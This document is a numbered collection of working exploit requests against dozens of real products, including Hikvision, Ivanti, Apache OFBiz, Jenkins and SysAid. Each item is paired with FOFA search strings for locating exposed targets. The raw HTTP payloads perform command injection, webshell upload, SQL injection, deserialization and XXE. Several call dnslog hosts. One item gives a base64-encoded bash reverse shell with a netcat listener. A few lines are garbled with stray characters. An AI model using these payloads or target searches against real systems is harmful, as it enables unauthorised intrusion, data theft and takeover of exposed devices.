The XML request body is omitted here (PAYLOAD).
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

" ?& A/ i0 u. {3 p# M  [4 v74. 致远M3-server 6_1sp1 反序列化RCE
( q/ i) g3 A' U; zFOFA:title="M3-Server"
7 r: ]5 S% w! ]4 i  q+ JPAYLOAD
; R6 P/ F# J8 H/ R! W: o& z# q% t/ z! Q( m: p# J3 _
75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
The time parameter of setSyncTimeHost is passed to a shell unquoted; the backticks run ifconfig and redirect its output into the CGI directory.
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) Palm Campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
FreeMarker template injection: the UnitCode value is rendered as a template, and freemarker.template.utility.Execute runs the command.
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

Then fetch the file the command wrote:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
The CuteSoft upload handler accepts a client-chosen folder and an .aspx filename.
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
The target form field selects the directory the file is written to.
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then fetch the uploaded file:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
The path parameter is passed to a shell; the pipe runs id.
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Suda (速达) Tianyao software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
The report parameter is the output file name and accepts ../, so the raw body is written as a .jsp under the web root.
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then request the written page:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
cmd 255 with an empty user name and login handle -1 returns account data without authentication.
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
The z2 parameter is interpolated into a shell command; the quoted pipe runs id.
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"
The JDBC connection test accepts an attacker-controlled data source definition; the body is omitted here (PAYLOAD). The Cmd header carries the command the payload echoes.
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"
The sql field is rendered through FreeMarker before it is used; the injected Execute call runs curl with the output of whoami in the host name, so the result surfaces as a DNS lookup.

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami`\")}",
  "type": "0"
}

85. SysAid On-Premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
Path traversal in accountId lets the POST body be written under tomcat/webapps. The exploit request below drops a Godzilla (哥斯拉) webshell; the body is omitted here (PAYLOAD).
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Shell URL after upload: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
The host parameter of the network test is passed to a shell; %0a (newline) terminates the ping command and ${IFS} stands in for the space that the filter strips.
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAPPSecurity (安恒) Mingyu security gateway (明御安全网关) aaa_local_web_preview file upload
FOFA:title="明御安全网关"
The suffix parameter is appended to the stored file name and accepts ../, so the part is written as a .php under the web root.
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

The file is then reachable at /jfhatuwe.php.

88. DBAPPSecurity (安恒) Mingyu security gateway (明御安全网关) aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
The type parameter reaches a shell; the %0a-delimited echo appends a PHP file under /usr/local/webui/.
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

The written file is then requested by the name used in the payload. The original listing gives /astdfkhl.php here, which does not match the request above (that one writes txzfsrur.php); use whichever name you put in the echo.

89. Seeyon FE collaborative office platform (致远互联FE协作办公平台) editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
The request path encodes the p of .jsp as %70 to slip past a filter that matches on the extension; the GUID parameter is injectable.
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
jsondata[type]=99 selects a branch of ping.php that runs the ip value as a command.
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision integrated security management platform (综合安防管理平台) orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
The /..;/ segment is the path-parameter trick that gets the request past the authentication filter on /center/api/task; fileName is then used with ../ unchecked.
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision operations management center (运行管理中心) session command execution
Fastjson deserialization; the JSON body is omitted here (PAYLOAD). The Testcmd header carries the command the payload runs.
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. QiAnXin Wangshen (奇安信网神) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
The import handler stores the upfile part under /attachements/ with its original name and no authentication.
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then fetch the uploaded file:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qianxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 Groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML content; the XML is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: replace with your own token
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
